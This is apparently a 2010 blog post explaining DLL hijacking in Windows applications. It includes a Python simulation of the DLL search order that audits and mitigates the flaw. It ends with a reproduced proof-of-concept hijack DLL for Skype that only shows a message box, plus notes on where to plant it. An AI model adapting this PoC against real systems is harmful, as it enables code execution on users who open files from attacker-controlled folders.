Exploiting DLL Hijacking Flaws

Posted: 27 August, 2010 in cyber culture, english, life, new, security

Have you already heard about the DLL pre-loading/hijacking problem that affects more than 200 Windows applications? The vulnerability is triggered when a vulnerable file type is opened from a directory controlled by the attacker: the application searches that directory for a DLL it needs and loads the attacker's copy instead of the legitimate one.

HD Moore (Metasploit) explains the problem and has added a *scanner* to the Metasploit Framework. Please read his blog entries linked below (they include a tool for scanning the local machine):

* http://blog.metasploit.com/2010/08/better-faster-stronger.html
* http://blog.metasploit.com/2010/08/exploiting-dll-hijacking-flaws.html
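To make the mechanism concrete, here is a small Python model of the Windows DLL search order, added here as an example; it is not code from this post, from Metasploit or from Astalavista. It assumes SafeDllSearchMode is on (the default since Windows XP SP2) and uses a constructed directory layout with placeholder paths (the `Z:\untrusted-share\docs` share, the `FILESYSTEM` contents and the DLL names requested by the application are all made up for the demo). The `cwd_searched=False` switch stands in for the effect of `SetDllDirectory("")` or the CWDIllegalInDllSearch policy from Microsoft's KB2264107, both of which drop the current working directory from the search. The audit function reports what a scanner like HD Moore's flags: a DLL that resolved from a directory outside the application and Windows directories.

```python
import ntpath

# Constructed directory layout for the model (placeholder paths, not a real system).
APP_DIR = r"C:\Program Files\Skype\Phone"          # where the application executable lives
SYSTEM_DIR = r"C:\Windows\System32"
WINDOWS_DIR = r"C:\Windows"
SYSTEM16_DIR = ntpath.join(WINDOWS_DIR, "System")  # 16-bit system directory
SHARE_DIR = r"Z:\untrusted-share\docs"             # attacker-controlled directory holding the .skype file
PATH_DIRS = [SYSTEM_DIR, WINDOWS_DIR]

# Constructed contents of each directory; the planted DLL sits next to the document.
FILESYSTEM = {
    APP_DIR: {"Skype.exe"},
    SYSTEM_DIR: {"kernel32.dll", "user32.dll"},
    SYSTEM16_DIR: set(),
    WINDOWS_DIR: set(),
    SHARE_DIR: {"contact.skype", "wab32.dll"},
}
# DLLs on the KnownDLLs list are always taken from System32 and never searched for.
KNOWN_DLLS = {"kernel32.dll", "user32.dll"}
TRUSTED_DIRS = {d.lower() for d in (APP_DIR, SYSTEM_DIR, SYSTEM16_DIR, WINDOWS_DIR)}


def search_order(cwd, cwd_searched=True):
    """Directories in the order Windows consults them with SafeDllSearchMode on:
    application directory, System32, 16-bit System, Windows, then the current
    working directory, then PATH.  cwd_searched=False models SetDllDirectory("")
    or the CWDIllegalInDllSearch policy, which drop the CWD from the list."""
    order = [APP_DIR, SYSTEM_DIR, SYSTEM16_DIR, WINDOWS_DIR]
    if cwd_searched:
        order.append(cwd)
    order.extend(PATH_DIRS)
    return order


def resolve_dll(name, cwd, cwd_searched=True):
    """Return the full path that LoadLibrary(name) would map, or None if not found."""
    lname = name.lower()
    if lname in KNOWN_DLLS:
        return ntpath.join(SYSTEM_DIR, name)
    for directory in search_order(cwd, cwd_searched):
        if lname in {f.lower() for f in FILESYSTEM.get(directory, ())}:
            return ntpath.join(directory, name)
    return None


def is_trusted_location(path):
    """True if the DLL came from the application or Windows directories
    (or was not loaded at all); False if it came from a user-writable place."""
    if path is None:
        return True
    return ntpath.dirname(path).rstrip("\\").lower() in TRUSTED_DIRS


def audit_open_document(requested_dlls, document_dir, cwd_searched=True):
    """Simulate the application opening a document from document_dir (which becomes
    its CWD) and report every DLL that resolved to an untrusted directory."""
    findings = {}
    for name in requested_dlls:
        path = resolve_dll(name, document_dir, cwd_searched)
        if not is_trusted_location(path):
            findings[name] = path
    return findings


if __name__ == "__main__":
    wanted = ["kernel32.dll", "user32.dll", "wab32.dll"]
    print("CWD searched:    ", audit_open_document(wanted, SHARE_DIR))
    print("CWD not searched:", audit_open_document(wanted, SHARE_DIR, cwd_searched=False))
```

With the CWD in the search list, the bare-name request for `wab32.dll` lands on the planted copy in the document's directory; with the CWD removed it resolves to nothing, so the load fails closed rather than executing attacker code. The durable fix on the application side is to load such DLLs by their full registered path instead of by bare name, which takes the search order out of the picture altogether.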

glafkos from Astalavista is now publishing exploit code for various vulnerable applications and their file types:
* Skype
* Adobe Illustrator
* Adobe InDesign
* Adobe OnLocation
* Adobe Premiere Pro
* Firefox <= 3.6.8
* Teamviewer

======== EXAMPLE OF A POC (SKYPE) ===============================
/*
Exploit Title: Skype <= 4.2.0.169 DLL Hijacking Exploit (wab32.dll)
Date: August 25, 2010
Author: Glafkos Charalambous (glafkos[@]astalavista[dot]com)
Version: Latest Skype v4.2.0.169
Tested on: Windows 7 x64 Ultimate
Vulnerable extensions: .skype
Greetz: Astalavista, OffSEC, Exploit-DB
Notes: Create folders %commonprogramfiles%\system and place wab32.dll
       %commonprogramfiles(x86)% on x64 bit */
 
 
#include <windows.h>
#define DllExport __declspec (dllexport)

/* Forward declaration: DllMain calls this before its definition below. */
int dll_hijack(void);

BOOL WINAPI DllMain (
            HINSTANCE hinstDLL,
            DWORD     fdwReason,
            LPVOID    lpvReserved)
{
  /* Show the proof-of-execution once, when the DLL is first mapped into
     the process, rather than again on every thread attach/detach. */
  if (fdwReason == DLL_PROCESS_ATTACH)
    dll_hijack();
  return TRUE;   /* returning FALSE would make the load fail and unload the DLL */
}

int dll_hijack(void)
{
  /* MessageBoxA: explicit ANSI variant, so the narrow string literals compile
     regardless of whether UNICODE is defined. */
  MessageBoxA(0, "Skype DLL Hijacking!", "DLL Message", MB_OK);
  return 0;
}
 
===============================================